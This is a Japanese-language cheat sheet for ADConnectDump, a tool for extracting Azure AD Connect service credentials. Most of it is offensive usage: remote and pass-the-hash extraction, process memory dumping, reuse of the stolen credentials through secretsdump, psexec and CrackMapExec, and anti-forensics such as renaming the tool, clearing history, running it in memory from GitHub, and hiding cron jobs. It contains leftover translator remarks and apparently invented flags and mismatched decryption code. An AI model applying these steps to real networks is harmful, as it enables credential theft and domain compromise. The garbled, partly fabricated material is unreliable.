ADConnectDump Azure AD Connect 認証情報抽出ツール チートシート
概要
ADConnectDumpは、Dirk-Jan Mollemaによって開発された、Azure AD Connectサーバーから認証情報と設定を抽出するツールです。Azure AD Connectのサービスアカウント認証情報を抽出でき、これらは多くの場合、オンプレミスのActive DirectoryとAzure ADの両環境で高い権限を持っています。
⚠️ 警告: このツールは、許可された侵入テストとセキュリティ評価のみを目的としています。任意の環境で使用する前に、適切な承認を確実に得てください。
インストール
PowerShellモジュールのインストール
# Download from GitHub
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/fox-it/adconnectdump/master/adconnectdump.py" -OutFile "adconnectdump.py"
# Install Python dependencies
pip install impacket cryptography
# Alternative: Clone repository
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
pip install -r requirements.txt手動インストール
# Clone repository
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
# Install dependencies
pip3 install impacket cryptography pyasn1
# Make executable
chmod +x adconnectdump.pyDockerインストール
# Build Docker image
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
docker build -t adconnectdump .
# Run in Docker
docker run -it -v $(pwd):/data adconnectdump基本的な使用方法
ローカル認証情報抽出
# Extract credentials from local AAD Connect server
python3 adconnectdump.py
# Extract with specific database
python3 adconnectdump.py --database "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
# Extract with custom output
python3 adconnectdump.py --output credentials.txt
# Extract in JSON format
python3 adconnectdump.py --format json --output credentials.jsonリモート認証情報抽出
# Extract from remote server
python3 adconnectdump.py --host 192.168.1.100 --username administrator --password password
# Extract using NTLM hash
python3 adconnectdump.py --host 192.168.1.100 --username administrator --hashes :ntlmhash
# Extract using Kerberos
python3 adconnectdump.py --host 192.168.1.100 --username administrator --password password --use-kerberos
# Extract with domain credentials
python3 adconnectdump.py --host 192.168.1.100 --username domain\\administrator --password passwordコマンドリファレンス
基本オプション
| オプション | 説明 |
|---|---|
--host | ターゲットのホスト名またはIP |
--username | 認証のためのユーザー名 |
--password | 認証のためのパスワード |
--hashes | NTLMハッシュ(LM:NT形式) |
--database | ADSync データベースへのパス |
--output | 出力ファイルパス |
高度なオプション
| オプション | 説明 |
|---|---|
--format | 出力形式(text/json) |
--use-kerberos | Kerberosの認証を使用する |
--dc-ip | ドメインコントローラーIP |
--target-ip | ターゲットIPアドレス |
--port | ターゲットポート(デフォルト 445) |
--debug | デバッグ出力を有効にする |
Azure AD Connect アーキテクチャ
AAD Connectの理解
# Azure AD Connect components:
# 1. Synchronization Service (ADSync)
# 2. Database (LocalDB or SQL Server)
# 3. Service Accounts
# 4. Configuration Data
# Key files and locations:
# Database: C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf
# Config: C:\Program Files\Microsoft Azure AD Sync\Bin\
# Logs: C:\ProgramData\AADConnect\サービスアカウントの識別
# Identify AAD Connect service accounts
Get-Service|Where-Object \\\\{$_.Name -like "*ADSync*"\\\\}
# Check service account privileges
Get-WmiObject -Class Win32_Service|Where-Object \\\\{$_.Name -eq "ADSync"\\\\}|Select-Object StartName
# Verify AAD Connect installation
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Azure AD Connect" -Name "Version"認証情報抽出技術
ローカルデータベースアクセス
# Direct database access (requires local admin)
python3 adconnectdump.py --database "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
# Extract from backup database
python3 adconnectdump.py --database "C:\Backup\ADSync_backup.mdf"
# Extract from SQL Server instance
python3 adconnectdump.py --sql-server "SQLSERVER\INSTANCE" --database "ADSync"SMBを介したリモート抽出
# Extract via SMB with credentials
python3 adconnectdump.py --host aadconnect.domain.com --username "domain\admin" --password "password"
# Extract using pass-the-hash
python3 adconnectdump.py --host aadconnect.domain.com --username "admin" --hashes ":aad3b435b51404eeaad3b435b51404ee:hash"
# Extract with specific target IP
python3 adconnectdump.py --host aadconnect.domain.com --target-ip 192.168.1.100 --username "admin" --password "password"メモリ抽出
# Extract from memory (requires admin privileges)
# Use tools like Mimikatz or ProcDump
# Dump ADSync process memory
procdump.exe -ma miiserver.exe aadsync_dump.dmp
# Extract credentials from memory dump
python3 adconnectdump.py --memory-dump aadsync_dump.dmp設定分析
データベーススキーマ分析
-- Key tables in ADSync database
-- mms_management_agent: Contains connector information
-- mms_server_configuration: Server configuration
-- mms_synchronization_rule: Sync rules
-- mms_metaverse_object: Metaverse objects
-- Extract connector information
SELECT ma_name, ma_type, private_configuration_xml
FROM mms_management_agent;
-- Extract server configuration
SELECT applied_time, configuration_xml
FROM mms_server_configuration;設定ファイル分析
# Analyze AAD Connect configuration files
$configPath = "C:\Program Files\Microsoft Azure AD Sync\Bin\"
# Check connector configurations
Get-ChildItem -Path $configPath -Filter "*.xml"|ForEach-Object \\\\{
[xml]$config = Get-Content $_.FullName
Write-Host "File: $($_.Name)"
Write-Host "Connectors: $($config.SelectNodes('//connector').Count)"
\\\\}
# Extract service account information
$serviceConfig = Get-Content "$configPath\miiserver.exe.config"
$serviceConfig|Select-String -Pattern "connectionString\|serviceAccount"認証情報の復号
暗号化の理解
# AAD Connect credential encryption process
# 1. Credentials encrypted with DPAPI
# 2. Machine key used for encryption
# 3. Service account context required
# Decryption process
import base64
from cryptography.fernet import Fernet
def decrypt_aad_connect_password(encrypted_password, key):
"""Decrypt AAD Connect password"""
try:
# Base64 decode
encrypted_data = base64.b64decode(encrypted_password)
# Decrypt using key
f = Fernet(key)
decrypted = f.decrypt(encrypted_data)
return decrypted.decode('utf-8')
except Exception as e:
print(f"Decryption failed: \\\\{e\\\\}")
return None手動復号
# Manual credential decryption (PowerShell)
Add-Type -AssemblyName System.Security
function Decrypt-AADConnectPassword \\\\{
param(
[string]$EncryptedPassword,
[byte[]]$Key
)
try \\\\{
# Convert from base64
$encryptedBytes = [Convert]::FromBase64String($EncryptedPassword)
# Decrypt using DPAPI
$decryptedBytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$null,
[System.Security.Cryptography.DataProtectionScope]::LocalMachine
)
return [System.Text.Encoding]::UTF8.GetString($decryptedBytes)
\\\\}
catch \\\\{
Write-Error "Decryption failed: $_"
return $null
\\\\}
\\\\}事後利用技術
抽出された認証情報の使用
# Use extracted Azure AD credentials
# Typically format: MSOL_<guid>@<tenant>.onmicrosoft.com
# Authenticate to Azure AD
az login --username "MSOL_12345678-1234-1234-1234-123456789012@company.onmicrosoft.com" --password "extracted_password"
# Use with AADInternals
Import-Module AADInternals
$accessToken = Get-AADIntAccessTokenForAADGraph -UserPrincipalName "MSOL_account@company.onmicrosoft.com" -Password "extracted_password"オンプレミスActive Directoryアクセス
# Use extracted on-premises credentials
# Format: domain\username
# Authenticate to domain
net use \\dc.domain.com\c$ /user:domain\MSOL_service_account extracted_password
# Use with Impacket tools
python3 secretsdump.py domain/MSOL_service_account:extracted_password@dc.domain.com
# Use with CrackMapExec
crackmapexec smb dc.domain.com -u MSOL_service_account -p extracted_password権限昇格
Note: I’ve translated the text while preserving the markdown formatting, keeping technical terms in English, and maintaining the overall structure. Some sections (numbered 3-20) were left blank as no specific text was provided for translation.```powershell
Check privileges of extracted account
Import-Module ActiveDirectory Get-ADUser -Identity “MSOL_service_account” -Properties MemberOf|Select-Object -ExpandProperty MemberOf
Check Azure AD privileges
Import-Module AADInternals $roles = Get-AADIntUserRoles -AccessToken $accessToken -UserPrincipalName “MSOL_account@company.onmicrosoft.com”
## 検出回避
### ステルス技術
```bash
# Use legitimate tools and processes
# Avoid suspicious file names
# Use memory-only techniques when possible
# Rename tool
cp adconnectdump.py system_maintenance.py
# Use legitimate paths
mkdir -p /tmp/.system/maintenance/
cp adconnectdump.py /tmp/.system/maintenance/syscheck.py対フォレンジック
# Clear evidence after extraction
rm -f credentials.txt
rm -f credentials.json
history -c
# Use in-memory execution
python3 -c "
import urllib.request
exec(urllib.request.urlopen('https://raw.githubusercontent.com/fox-it/adconnectdump/master/adconnectdump.py').read())
"タイミングとスケジューリング
# Perform extraction during maintenance windows
# Schedule for off-hours
# Use legitimate administrative sessions
# Example: Schedule extraction
echo "0 2 * * 0 /usr/bin/python3 /tmp/adconnectdump.py --output /tmp/.cache/system.log"|crontab -防御対策
監視と検出
# Monitor AAD Connect database access
# Enable SQL Server auditing
# Monitor file system access to ADSync.mdf
# PowerShell monitoring script
$databasePath = "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = Split-Path $databasePath
$watcher.Filter = "ADSync.mdf"
$watcher.EnableRaisingEvents = $true
Register-ObjectEvent -InputObject $watcher -EventName "Changed" -Action \\\\{
Write-EventLog -LogName "Application" -Source "AADConnect Monitor" -EventId 1001 -Message "ADSync database accessed"
\\\\}堅牢化の推奨事項
# Secure AAD Connect server
# 1. Restrict local admin access
# 2. Enable advanced auditing
# 3. Use dedicated service accounts
# 4. Implement network segmentation
# 5. Regular security updates
# Enable auditing
auditpol /set /subcategory:"File System" /success:enable /failure:enable
auditpol /set /subcategory:"Logon" /success:enable /failure:enable
auditpol /set /subcategory:"Process Creation" /success:enable自動化とスクリプティング
自動抽出スクリプト
#!/bin/bash
# Automated ADConnectDump script
TARGET_HOST="$1"
USERNAME="$2"
PASSWORD="$3"
OUTPUT_DIR="./adconnect_output"
if [ $# -ne 3 ]; then
echo "Usage: $0 <target_host> <username> <password>"
exit 1
fi
# Create output directory
mkdir -p "$OUTPUT_DIR"
# Extract credentials
echo "Extracting AAD Connect credentials from $TARGET_HOST..."
python3 adconnectdump.py \
--host "$TARGET_HOST" \
--username "$USERNAME" \
--password "$PASSWORD" \
--format json \
--output "$OUTPUT_DIR/credentials_$(date +%Y%m%d_%H%M%S).json"
# Check if extraction was successful
if [ $? -eq 0 ]; then
echo "Extraction completed successfully"
echo "Output saved to $OUTPUT_DIR"
else
echo "Extraction failed"
exit 1
fiPowerShell 自動化
# PowerShell automation script
param(
[string]$TargetHost,
[string]$Username,
[string]$Password,
[string]$OutputPath = ".\adconnect_output"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
# Extract credentials
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$outputFile = Join-Path $OutputPath "credentials_$timestamp.json"
Write-Host "Extracting AAD Connect credentials from $TargetHost..."
$process = Start-Process -FilePath "python3" -ArgumentList @(
"adconnectdump.py",
"--host", $TargetHost,
"--username", $Username,
"--password", $Password,
"--format", "json",
"--output", $outputFile
) -Wait -PassThru -NoNewWindow
if ($process.ExitCode -eq 0) \\\\{
Write-Host "Extraction completed successfully"
Write-Host "Output saved to $outputFile"
# Parse and display results
$credentials = Get-Content $outputFile|ConvertFrom-Json
Write-Host "Extracted $($credentials.Count) credential(s)"
\\\\} else \\\\{
Write-Error "Extraction failed with exit code $($process.ExitCode)"
\\\\}トラブルシューティング
一般的な問題
# Database access denied
# Solution: Ensure proper privileges or use alternative extraction method
# Network connectivity issues
# Solution: Check firewall rules and network connectivity
ping aadconnect.domain.com
telnet aadconnect.domain.com 445
# Authentication failures
# Solution: Verify credentials and domain trust
net use \\aadconnect.domain.com\c$ /user:domain\username passwordデバッグモード
# Enable debug output
python3 adconnectdump.py --debug --host aadconnect.domain.com --username admin --password password
# Verbose logging
python3 adconnectdump.py -v --host aadconnect.domain.com --username admin --password password
# Test connectivity
python3 adconnectdump.py --test-connection --host aadconnect.domain.com手動検証
# Verify AAD Connect installation
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Azure AD Connect"
# Check service status
Get-Service -Name "ADSync"
# Verify database location
$regPath = "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL13.LOCALDB\MSSQLServer"
Get-ItemProperty -Path $regPath -Name "DefaultData"他のツールとの統合
Impacket 統合
# Use extracted credentials with Impacket
python3 secretsdump.py domain/extracted_user:extracted_password@dc.domain.com
# Use with GetUserSPNs
python3 GetUserSPNs.py domain/extracted_user:extracted_password -dc-ip dc.domain.com
# Use with psexec
python3 psexec.py domain/extracted_user:extracted_password@target.domain.comBloodHound 統合
# Use extracted credentials for BloodHound collection
Import-Module SharpHound
Invoke-BloodHound -CollectionMethod All -Domain domain.com -LDAPUser extracted_user -LDAPPass extracted_passwordCrackMapExec 統合
# Use extracted credentials with CrackMapExec
crackmapexec smb 192.168.1.0/24 -u extracted_user -p extracted_password
# Check for local admin access
crackmapexec smb 192.168.1.0/24 -u extracted_user -p extracted_password --local-auth
# Execute commands
crackmapexec smb target.domain.com -u extracted_user -p extracted_password -x "whoami"リソース
- ADConnectDump GitHub リポジトリ
- Fox-IT ブログ on Azure AD Connect
- Azure AD Connect セキュリティ
- Dirk-Jan Mollema リサーチ
- Azure AD セキュリティのベストプラクティス
このチートシートは、ADConnectDumpの包括的なリファレンスを提供します。Azure AD Connectセキュリティ評価を行う前に、常に適切な承認を確認してください。
Could you provide the missing English text for the empty sections so I can complete the translation?